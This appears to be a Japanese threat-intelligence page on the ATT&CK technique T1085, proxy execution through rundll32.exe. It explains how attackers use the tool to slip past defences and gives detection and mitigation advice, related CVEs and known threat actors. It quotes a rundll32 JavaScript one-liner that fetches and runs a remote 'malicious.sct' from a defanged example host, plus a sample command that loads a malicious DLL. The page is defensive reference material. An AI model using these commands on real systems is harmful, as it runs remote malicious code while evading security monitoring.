Trusted Design

T1085 - Rundll32

概要

The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.

Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)

Rundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)

管理者によるコメント

攻撃者が頻繁に悪用するWindowsの標準ツール rundll32.exe を用いた攻撃手法です。

1. 概要

rundll32.exe は、DLL（ダイナミック・リンク・ライブラリ）内の関数を実行するためのWindows標準コマンドラインユーティリティです。

• 何を実現できるのか: 本来はシステムが使用するツールですが、攻撃者はこれを使って悪意のあるDLLを「正規のプロセス」として実行します。
• 検知のバイパス: 実行ファイル（.exe）を直接起動するのではなく、信頼されたWindowsバイナリ（LOLBin: Living Off the Land Binaries）を介してコードを動かすため、アプリケーションのホワイトリストや簡易的な監視をすり抜けることができます。

2. 攻撃の流れ

攻撃者は、通常の実行ファイル形式（.exe）ではなく、DLL形式でマルウェアをターゲットに送り込みます。

1. 侵入・配置: フィッシングメールなどを通じて、悪意のあるDLL（例：malware.dll）をシステムに保存させます。
2. コマンド実行: rundll32.exe を呼び出し、引数として保存したDLLと実行したい関数名を指定します。
   • 例: rundll32.exe C:\test\malware.dll,StartProcess
3. メモリ展開: rundll32.exe のプロセス空間内にDLLが読み込まれ、悪意のある処理が開始されます。
4. ネットワーク通信: 多くの場合、このDLLは外部のC2サーバーへ通信を開始し、さらなる指示を仰ぎます。

3. 防御・対策

標準ツールを悪用するため、ツール自体の削除はできません。「不自然な呼び出し」を監視することが重要です。

• コマンドライン引数の監視: EDR（Endpoint Detection and Response）やSysmonを使用して、rundll32.exe が実行された際の引数を記録・監視します。インターネット一時フォルダや不審なパスからDLLを読み込んでいないかチェックします。
• ネットワーク監視: rundll32.exe プロセスが外部IPアドレスと直接通信を行うことは稀です。このプロセスによる不審なネットワーク接続をブロックします。
• バイナリの実行制限: Windows Defender Application Control (WDAC) や AppLocker を使用して、承認されていないDLLの読み込みを制限します。

4. 重要ポイント

• LOLBin（環境寄生型バイナリ）の代表格: OSに最初から入っている「正規ツール」を武器に変える手法の典型例です。
• プロセスの親子関係: rundll32.exe の親プロセスがブラウザやメールソフト（Outlookなど）、またはWord/Excel（マクロ経由）である場合、侵害の可能性が非常に高いと判断されます。

5. 関連する主なCWE

• CWE-427: Uncontrolled Search Path Element: 意図しないパスからDLLを読み込ませる「DLLプリロード」的な悪用に関連します。
• CWE-73: External Control of File Name or Path: ユーザー（攻撃者）が入力したパスに基づいてファイルが操作される脆弱性。

6. 関連する代表的なCVE

rundll32.exe 自体に脆弱性があるというよりは、「他の脆弱性でコードを実行する際の踏み台」として使われます。

• CVE-2017-0199: Microsoft Officeの脆弱性。悪意のある文書を開くと、内部的に rundll32.exe を介してリモートのスクリプトやDLLが実行されるケースが多く見られました。
• CVE-2021-40444: MSHTML（Internet Explorerのエンジン）の脆弱性。Office文書をプレビューするだけで、最終的に rundll32.exe を使ってマルウェアをロードさせる攻撃が確認されました。
• CVE-2023-36884: OfficeおよびWindowsの脆弱性。高度な標的型攻撃（APT）において、rundll32.exe を利用した検知回避が組み合わされました。

分析

この攻撃手法を利用する脅威アクター

• Lazarus Group
• Wizard Spider

関連する CVE

この攻撃手法に関連する CVE は登録されていません。

攻撃手法 – 脅威アクター Graph

---

← Technique一覧に戻る ← Tactics一覧に戻る